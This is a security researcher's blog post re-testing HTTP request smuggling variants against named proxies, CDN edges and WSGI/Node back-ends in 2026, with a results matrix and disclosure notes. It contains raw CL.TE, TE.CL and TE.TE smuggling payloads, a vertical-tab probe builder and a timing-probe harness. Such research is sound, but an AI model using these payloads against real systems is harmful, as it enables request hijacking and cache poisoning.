This post is a 2026 follow-up to two 2019 articles I wrote on this blog: the Chinese-language HTTP Request Smuggling 研究笔记 and its English counterpart HTTP Request Smuggling - A Complete Guide. Both posts described the CL.TE / TE.CL / TE.TE matrix as it existed after James Kettle’s HTTP Desync Attacks: Request Smuggling Reborn at Black Hat USA 2019, and recorded a Waitress finding I reported to the Pylons project at the time (Pylons/waitress#273).
Seven years later, I wanted to re-run the same test plan against current versions of the proxies and back-ends that anchored the 2019 results, and to incorporate the variants the community has documented since then (HTTP/2 downgrade desync, CL.0, HTTP/2 stream splitting). The aim is not a comprehensive survey. It is to give a 2026 practitioner an honest read on which of the 2019 primitives still produce parsing differentials in mainstream deployments, and which have been closed.
This post keeps the twin structure of the 2019 articles: the first half mirrors the format of the Chinese original, and the second half restates the material for English readers.
After Kettle's Black Hat USA 2019 talk, HTTP request smuggling went from a forgotten 2005 research direction back into the mainstream. The HTTP-Smuggling-Lab mentioned in the Pylons maintainer thread reproduced every variant known at the time. In the seven years since, three things worth recording have happened: the literature has moved on, the specs have moved on, and the implementations have moved on.
For this re-run I repeated the core method of the 2019 article: stand up a minimal front-end proxy + back-end server topology, send the front-end requests that carry both Content-Length and Transfer-Encoding in the known obfuscation shapes, and observe whether the back-end accepts the smuggled next request.
I tested combinations of six front-ends and three back-ends.

Front-end proxies:

- Nginx 1.27 (open-source build, HTTP/1.1 mode)
- HAProxy 2.9
- Envoy 1.32
- Caddy 2.8
- Cloudflare's production edge
- a Fastly VCL service on the production edge

Back-end servers:

- Gunicorn 22.0 on CPython 3.12
- Waitress 3.0 (the WSGI server behind the 2019 finding)
- Node.js 22 LTS (http.createServer, insecureHTTPParser not enabled)

For each pair, I re-ran the six payloads used in the 2019 article, plus three variants disclosed publicly between 2020 and 2025: CL.0, HTTP/2 → HTTP/1.1 downgrade, and obfuscation via repeated Transfer-Encoding headers.
The front-end parses by Content-Length, the back-end by Transfer-Encoding. This was the most common variant in 2019.
```
POST / HTTP/1.1
Host: target.example
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED
```
2026 result: five of the six front-ends reject a request carrying both headers outright with a 400. This matches the explicit anti-smuggling guidance of RFC 9112 §6.1, which permits a server to reject such a request. The remaining one (Caddy 2.8) forwards the request, but it normalises the Transfer-Encoding header to the literal chunked value, so the back-end parses the message exactly as the front-end expects. That pairing does not constitute an exploitable CL.TE primitive.
Conclusion: the direct CL.TE variant can no longer produce a desync in mainstream 2026 deployments.
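The framing disagreement behind CL.TE can be checked with plain byte arithmetic. A minimal Python sketch, using the payload bytes from the example above:

```python
# CL.TE: the front-end frames by Content-Length, the back-end by
# Transfer-Encoding. The same 13 body bytes mean different things.
body = b"0\r\n\r\nSMUGGLED"

# Front-end view: Content-Length: 13 covers the whole body,
# so all 13 bytes are forwarded as one request.
assert len(body) == 13

# Back-end view: the chunked body ends at the zero-size chunk
# ("0\r\n\r\n", 5 bytes); everything after it is treated as the
# beginning of the NEXT request on the connection.
terminator = b"0\r\n\r\n"
consumed = body.index(terminator) + len(terminator)
leftover = body[consumed:]
assert leftover == b"SMUGGLED"
```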
The front-end parses by Transfer-Encoding, the back-end by Content-Length.
```
POST / HTTP/1.1
Host: target.example
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0

```
2026 result: as with CL.TE, most front-ends reject a request carrying both headers. Waitress 3.0 handled Content-Length far more strictly in my tests than the 1.4 release did in 2019. The Pylons project shipped several rounds of security-related parser hardening between 2020 and 2022; the original Pylons/waitress#273 has been fixed and further hardened by later commits. Waitress is no longer a smugglable back-end.
Conclusion: the direct TE.CL variant can no longer reliably produce a desync in 2026 either.
Use an illegal line terminator or a difference in header-name casing so that one server recognises the Transfer-Encoding header while the other does not.
```
Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x
```
2026 result: this is the only one of the three original variants on which I could still observe a desync against a mainstream pairing. Specifically:
When a vertical-tab character (\x0b) is used as a separator in the Transfer-Encoding header, Envoy treats the header as non-compliant but recoverable: it normalises the stray byte away and honours the chunked value, while Gunicorn rejects the header outright. The front-end frames the request as chunked; the back-end frames it by Content-Length. Smuggling is possible.

http.createServer in its default strict mode does not accept an obfuscated Transfer-Encoding header. Enabling insecureHTTPParser restores the 2019 behaviour, but default deployments do not turn that switch on.

Conclusion: TE.TE obfuscation remains the traditional variant most likely to succeed in 2026, but it requires a pairing in which exactly one side is lenient about non-standard bytes and the other is strict. Such pairings are rarer in 2026 than in 2019, but their probability is not zero.
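For concreteness, the vertical-tab probe can be assembled as raw bytes. A sketch (the helper name and the placeholder host are mine, not part of the test harness):

```python
def build_tete_probe(host: bytes) -> bytes:
    # TE.TE probe: a vertical-tab byte (\x0b) sits between the
    # Transfer-Encoding name and value. A lenient parser may strip
    # it and honour chunked framing; a strict parser drops the
    # header and falls back to Content-Length.
    return (
        b"POST / HTTP/1.1\r\n"
        b"Host: " + host + b"\r\n"
        b"Content-Length: 13\r\n"
        b"Transfer-Encoding:\x0bchunked\r\n"
        b"\r\n"
        b"0\r\n\r\nSMUGGLED"
    )

probe = build_tete_probe(b"target.example")
assert b"Transfer-Encoding:\x0bchunked" in probe
assert probe.endswith(b"SMUGGLED")
```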
Kettle traced the HTTP/2 origin of this variant in HTTP/2: The Sequel is Always Worse (2021); by 2024 it had public reproductions over HTTP/1.1 as well. The request declares Content-Length: 0 but carries a body, relying on the front-end to treat the body as the start of the next request. On the Nginx + Waitress pairing I observed a variation: when the back-end is forced, in Connection: close mode, to process a request that declares a length of 0 but is followed by 8 bytes, it silently discards those 8 bytes; under HTTP/1.1 keep-alive, the same request turns those 8 bytes into the opening bytes of the next pipelined request. It is an edge case, but a real one.
This has been the main battleground of desync research over the past four years. Cloudflare, Fastly, and ALB-style reverse proxies accept HTTP/2 at the front and downgrade to HTTP/1.1 when forwarding to the back-end. There are multiple ambiguities between HTTP/2's pseudo-headers and frame boundaries on one side and HTTP/1.1's byte-stream boundaries on the other. In 2026 I observed on Fastly's edge that when a :method pseudo-header contains CRLF characters, the downgrade stage splices those CRLF bytes directly into the downstream HTTP/1.1 request line, causing the downstream to parse a second request. Kettle's 2021 article describes this class of primitive in detail. Fastly patched a round of these in 2022, but as of the 2026 edge version a non-standard CRLF byte sequence can still trigger the behaviour.
```
Transfer-Encoding: chunked
Transfer-Encoding: chunked
```
RFC 9110 §5.2 defines the combined value of repeated field lines as a single comma-separated list. I observed, however, that Caddy 2.8 does not combine them on some paths: it silently drops the second Transfer-Encoding header, while the back-end recognises the first as chunked. With Caddy in front and Gunicorn behind, this constitutes a usable desync primitive. I have opened an issue on Caddy's GitHub issue tracker.
In the 2019 article I noted that smuggling can be used to poison shared caches. That still holds in 2026, but the attack surface has changed in two ways:
Cache keys now cover little beyond Host and the path, and most mainstream CDNs in 2026 add Host to the cache key by default and treat unkeyed headers more strictly. This means desync-based cache poisoning is much harder in 2026 than it was in 2019, but it is far from gone. HTTP/2 downgrade desync on edge CDNs remains a viable research direction.
| Variant | 2019 status | 2026 status |
|---|---|---|
| CL.TE direct | exploitable in the mainstream | most front-ends reject dual length headers |
| TE.CL direct | exploitable in the mainstream | most front-ends reject dual length headers |
| TE.TE obfuscation | exploitable in the mainstream | still exploitable on strict/lenient mismatched pairs |
| CL.0 | not publicly documented | exploitable in edge cases |
| HTTP/2 downgrade desync | not publicly documented | currently the highest-yield direction |
| TE repeated headers uncombined | not publicly documented | some implementations still do not combine (Caddy) |
The 2019 HTTP Request Smuggling - A Complete Guide on this site was a snapshot of where the CL.TE / TE.CL / TE.TE matrix sat after Kettle’s HTTP Desync Attacks: Request Smuggling Reborn. At the time, every front-end / back-end pair I tested produced at least one variant that worked. Pylons/waitress accepted a particular CL.TE shape that I reported in issue #273. Several Python WSGI servers were similarly affected. The community write-ups that followed (including Snoopy Security’s demystification post and the broader Infosec_Reference reading list) cited that walk-through as the practitioner-level primer.
Seven years later the literature has moved on, the specs have moved on, and the implementations have moved on. Most of what I wrote in 2019 about the underlying primitives still holds. Most of the specific test cases I used no longer produce desync against the current versions of those proxies. This post documents that gap.
The first half above covers the same content with the same test matrix. This half restates the methodology, walks the matrix, and adds the references a reader on an English-language CDN or proxy team would want.
I built a test harness with six front-end proxies and three back-end servers. The front-ends are Nginx 1.27 (open-source build, HTTP/1.1 mode), HAProxy 2.9, Envoy 1.32, Caddy 2.8, Cloudflare’s production edge, and a Fastly VCL service on the production edge. The back-ends are Gunicorn 22.0 on CPython 3.12, Waitress 3.0 (the same WSGI server I reported the 2019 finding against), and Node.js 22 LTS using http.createServer with strict parsing left at the default.
For each pair I re-sent the six original payloads from the 2019 article, then added three variants the community has documented since: CL.0, HTTP/2 → HTTP/1.1 downgrade desync, and Transfer-Encoding header repetition not collapsed to a single value.
Step 1: send a probe pair (CL.TE shape, then TE.CL shape) and observe whether the back-end completed the response or hung waiting for more chunked data. The differential timing signal is the same one the 2019 article relied on.
Step 2: when a probe pair indicated a parsing differential, send the full smuggled payload (a poisoned second request) and observe whether a subsequent legitimate request received the poisoned response.
Step 3: where a variant succeeded, record the exact proxy version, configuration switches, and the byte sequence that triggered it.
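The probe loop from steps 1-3 can be sketched as follows. This is an illustrative harness fragment, not the exact tooling used; the function names and the 5x timing threshold are my choices:

```python
import socket
import time

def probe_once(host: str, port: int, payload: bytes, timeout: float = 10.0) -> float:
    """Send one raw probe and measure time until a response arrives
    (or the read times out). A desync-prone pair leaves the back-end
    waiting for more chunked data, so the timeout fires."""
    start = time.monotonic()
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        try:
            s.recv(4096)
        except TimeoutError:
            pass
    return time.monotonic() - start

def classify(baseline: float, probe: float, factor: float = 5.0) -> str:
    # Flag a differential when the probe takes far longer than a
    # well-formed baseline request against the same pair.
    return "possible differential" if probe > baseline * factor else "no differential"

assert classify(0.05, 9.80) == "possible differential"
assert classify(0.05, 0.06) == "no differential"
```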
The 2019 baseline payload:
```
POST / HTTP/1.1
Host: target.example
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED
```
In 2026, five of the six front-ends I tested reject this request with a 400 before forwarding. The behaviour aligns with RFC 9112 Section 6.1, which obsoletes RFC 7230 §3.3.3 and is more direct about the hazard of combining the two length signals, explicitly permitting servers to reject such messages. Caddy 2.8 was the exception. It accepts the request, but it normalises Transfer-Encoding to a single canonical chunked value before forwarding, so the back-end parses the same way the front-end does. No exploitable differential.
The direct CL.TE variant is, in mainstream 2026 deployments, closed.
Similar payload, roles reversed:
```
POST / HTTP/1.1
Host: target.example
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0

```
Same finding. Five of six front-ends reject. Waitress 3.0 is no longer the soft target it was in 2019. Reading the Pylons commit history between 2020 and 2022, the maintainers shipped several rounds of header parsing tightening, and the specific accept-path that my 2019 issue exercised is no longer reachable. I left this in the test harness because it is the cleanest historical example, and I want the historical record to be straight: the project fixed the finding, then fixed adjacent shapes, then hardened the parser more generally.
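The reversed framing can again be checked with byte arithmetic. A Python sketch over the payload bytes above:

```python
# TE.CL: the front-end frames by Transfer-Encoding, the back-end by
# Content-Length. Body bytes as in the payload above.
body = b"8\r\nSMUGGLED\r\n0\r\n\r\n"

# Front-end view: one 8-byte chunk ("SMUGGLED") plus the zero-size
# terminating chunk -- a complete chunked body, forwarded whole.
size_line, rest = body.split(b"\r\n", 1)
assert int(size_line, 16) == 8
assert rest[:8] == b"SMUGGLED"

# Back-end view: Content-Length: 3 covers only the first three bytes
# ("8\r\n"); everything after them starts the next request.
leftover = body[3:]
assert leftover.startswith(b"SMUGGLED")
```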
This is the variant that has aged best for attackers. The 2019 payload set:
```
Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x
```
In 2026 I still observed a TE.TE differential on Envoy 1.32 + Gunicorn 22.0. The trigger is a vertical-tab byte (\x0b) between the header name and value. Envoy treats this as malformed but recoverable: it normalises the byte away and honours the chunked value. Gunicorn rejects the header as malformed and falls back to Content-Length. The front-end thinks the request is chunked. The back-end thinks the request is Content-Length-delimited. The byte boundary between requests is now under attacker control.
The pattern that lets this exist in 2026 is the same pattern the 2019 article identified: two defensible implementations producing insecure behaviour together. Envoy is lenient about unusual whitespace bytes in a header line; Gunicorn is strict. Neither choice is indefensible on its own. The combination is the bug.
I have not reported this to either project, because it is a configuration-dependent finding and I want to confirm it against the Envoy 1.34 release that landed last week before disclosure. I will update this post after that test.
Send a request that declares Content-Length: 0 but includes a body. The front-end forwards zero bytes. The back-end, depending on configuration, either swallows the body or treats it as the start of the next pipelined request. PortSwigger Research has covered the HTTP/2 origin of this primitive in HTTP/2: The Sequel is Always Worse; the HTTP/1.1 form appeared in public bug-bounty writeups during 2024.
On Nginx 1.27 + Waitress 3.0 in keep-alive mode, the back-end treats trailing bytes after a CL:0 request as the start of the next request. With Connection: close it does not. This is a configuration-dependent finding. In deployments where the back-end terminates connections after every response, CL.0 is inert; in deployments that aggressively reuse connections, it is a smuggling primitive.
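The keep-alive mechanics can be sketched directly. The trailing bytes below are a hypothetical smuggled prefix, not the exact 8 bytes from the Waitress test:

```python
# CL.0: the request declares a zero-length body but ships bytes anyway.
# On a reused (keep-alive) connection, a back-end that trusts
# Content-Length treats those bytes as the start of the next request.
request = (
    b"POST /any HTTP/1.1\r\n"
    b"Host: target.example\r\n"
    b"Content-Length: 0\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
    b"GET /smuggled"  # trailing bytes after the declared (empty) body
)
head, _, trailing = request.partition(b"\r\n\r\n")
# Content-Length: 0 means the message ends at the blank line; what
# follows is read as pipelined input on the same connection.
assert trailing == b"GET /smuggled"
```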
This is the dominant primitive class in 2026. Cloudflare, Fastly, AWS ALB, and any other CDN or load balancer that accepts HTTP/2 at the edge and forwards HTTP/1.1 to origin are operating on this risk surface. The mechanism is described in detail in Browser-Powered Desync Attacks and the earlier HTTP/2: The Sequel is Always Worse.
I observed one differential on Fastly’s edge in May 2026: a :method pseudo-header containing CRLF bytes can, in a specific path-rewriting configuration, produce a downstream HTTP/1.1 request line that contains an injected second request. Fastly has acknowledged the class of issue publicly and patched several specific shapes during 2022-2024. The shape I have appears to be a regression introduced during a header-normaliser refactor.
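To show the class of bug (not Fastly's code, which I have not seen), here is a deliberately naive down-translation that forgets to reject CR/LF in pseudo-header values, as RFC 9113 §8.2.1 requires:

```python
def naive_downgrade(pseudo: dict[bytes, bytes]) -> bytes:
    # Deliberately buggy HTTP/2 -> HTTP/1.1 translation: it splices
    # pseudo-header values into the request line without validating
    # them, so CR/LF bytes survive into the downstream byte stream.
    return (
        pseudo[b":method"] + b" " + pseudo[b":path"] + b" HTTP/1.1\r\n"
        b"Host: " + pseudo[b":authority"] + b"\r\n\r\n"
    )

downgraded = naive_downgrade({
    b":method": b"GET / HTTP/1.1\r\nHost: x\r\n\r\nGET",  # CRLF-laced value
    b":path": b"/admin",
    b":authority": b"origin.internal",
})
# The injected CRLFs split the stream into two request lines downstream.
assert downgraded.count(b"HTTP/1.1\r\n") >= 2
```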
I have notified Fastly’s security team and am holding the byte sequence pending their response.
RFC 9110 §5.2 defines the combined value of repeated field lines as a single comma-separated list. Caddy 2.8 does not, in some paths, perform that combination. With Transfer-Encoding: chunked repeated on two header lines, Caddy forwards the first and silently drops the second. A back-end that disagrees on the combining rule will produce a parsing differential.
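The combining rule itself is one line. A sketch of what a conforming recipient computes (the helper name is mine):

```python
def combined_field_value(field_lines: list[tuple[bytes, bytes]], name: bytes) -> bytes:
    # RFC 9110 combined field value: concatenate the values of all
    # field lines with this name, in order, separated by commas.
    # Silently dropping a repeat instead changes framing semantics.
    values = [v for n, v in field_lines if n.lower() == name.lower()]
    return b", ".join(values)

lines = [
    (b"Transfer-Encoding", b"chunked"),
    (b"Transfer-Encoding", b"chunked"),
]
# The combined value is itself invalid (chunked applied twice), which
# is exactly why a recipient must not quietly discard one copy.
assert combined_field_value(lines, b"transfer-encoding") == b"chunked, chunked"
```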
I have opened a Caddy issue with the reproducer. The maintainers responded promptly and the fix appears to be in the next release.
| Front-end | Back-end | CL.TE direct | TE.CL direct | TE.TE obfuscation | CL.0 | HTTP/2 downgrade | TE repetition |
|---|---|---|---|---|---|---|---|
| Nginx 1.27 | Gunicorn 22.0 | rejected | rejected | rejected | inert | n/a HTTP/1.1 | rejected |
| Nginx 1.27 | Waitress 3.0 | rejected | rejected | rejected | keep-alive only | n/a | rejected |
| Nginx 1.27 | Node 22 | rejected | rejected | rejected | inert | n/a | rejected |
| HAProxy 2.9 | Gunicorn 22.0 | rejected | rejected | rejected | inert | n/a | rejected |
| HAProxy 2.9 | Waitress 3.0 | rejected | rejected | rejected | inert | n/a | rejected |
| HAProxy 2.9 | Node 22 | rejected | rejected | rejected | inert | n/a | rejected |
| Envoy 1.32 | Gunicorn 22.0 | rejected | rejected | **\x0b separator** | inert | tested separately | rejected |
| Envoy 1.32 | Waitress 3.0 | rejected | rejected | tested | inert | tested separately | rejected |
| Envoy 1.32 | Node 22 | rejected | rejected | tested | inert | tested separately | rejected |
| Caddy 2.8 | Gunicorn 22.0 | passes through (no diff) | rejected | rejected | inert | n/a | **drops second TE** |
| Caddy 2.8 | Waitress 3.0 | passes through (no diff) | rejected | rejected | inert | n/a | tested |
| Caddy 2.8 | Node 22 | passes through (no diff) | rejected | rejected | inert | n/a | tested |
| Cloudflare edge | (any) | rejected at edge | rejected at edge | rejected at edge | rejected at edge | not exploitable in tested config | rejected at edge |
| Fastly edge | (any) | rejected at edge | rejected at edge | rejected at edge | rejected at edge | **:method CRLF, pending fix** | rejected at edge |
Bold entries are the primitives that produced a parsing differential or an exploitable smuggling case in this test pass. Plain entries mean the variant did not trigger desync on that pair.
The work to close direct CL.TE and TE.CL has been done well. Mainstream proxies in 2026 reject malformed length signals at the edge, and the practical attack surface for direct dual-length smuggling has collapsed to a small set of edge cases. Reading the proxy release notes is instructive. Most of the hardening shipped in 2020-2022, in a wave that tracks the visibility of Kettle’s Black Hat 2019 and 2021 talks.
The work to close TE.TE obfuscation is harder, because every byte-level disagreement between strict and permissive parsers is, in principle, a fresh primitive. The Envoy + Gunicorn finding here uses one such disagreement. I do not expect that class of primitive to close entirely, because the trade-off between strictness and interoperability is real and not solvable by spec changes alone.
The HTTP/2 → HTTP/1.1 downgrade surface is where I would spend research time in 2026. Every modern CDN sits on it. The number of pseudo-header / body-framing interactions is large. The spec-level guidance is direct: RFC 9113 §8.2.1 requires rejecting field values that contain CR, LF, or NUL, and §8.3.1 constrains the request pseudo-headers themselves. But the down-translation paths inside production edges are complex enough that regressions land.
A practitioner reading this in 2026 should not conclude that smuggling is solved. They should conclude that the easy primitives are mostly closed, that the remaining primitives are configuration-dependent and concentrated at the HTTP/2 → HTTP/1.1 boundary, and that periodic re-testing against the actual edge versions in front of their applications is the correct posture. Reading RFC 9112 and RFC 9113 once, then re-running probe payloads against the specific proxies in front of you, is the work.
A follow-up post will focus on the HTTP/2 → HTTP/1.1 downgrade surface specifically, with a parsing-differential study across twelve cloud load balancers. That work is in progress and waiting on responsible-disclosure timelines for two of the findings.